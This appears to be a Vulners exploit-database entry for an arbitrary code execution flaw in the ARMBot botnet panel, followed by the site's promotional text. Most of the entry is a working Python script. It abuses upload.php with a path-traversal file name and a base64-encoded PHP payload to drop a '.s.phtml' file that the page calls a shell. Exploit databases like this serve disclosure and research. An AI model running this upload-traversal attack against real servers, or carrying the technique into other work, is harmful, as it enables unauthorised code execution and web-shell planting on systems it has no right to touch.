Lucene search
K

ARMBot Botnet - Arbitrary Code Execution

🗓️ 05 Aug 2019 00:00:00Reported by prsecurityType 
exploitpack
 exploitpack
👁 15 Views

ARMBot Botnet allows arbitrary code execution via file upload with proxies enabled. Target URL is "http://127.0.0.1/ARMBot/upload.php". Exploit can be found at "http://127.0.0.1/.s.phtml

Code
import requests

URL = "http://127.0.0.1/ARMBot/upload.php"
r = requests.post(URL,
                  data = {
                     "file":"../public_html/lol/../.s.phtml", # need some trickery for each server ;)
                     "data":"PD9waHAgZWNobyAxOyA/Pg==", # <?php echo 1; ?>
                     "message":"Bobr Dobr"
                  }, proxies={"http":"127.0.0.1:8080","https":"127.0.0.1:8080"})
print(r.status_code)
print("shell should be at http://{}/.s.phtml".format(URL))

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Aug 2019 00:00Current
0.7Low risk
Vulners AI Score0.7
15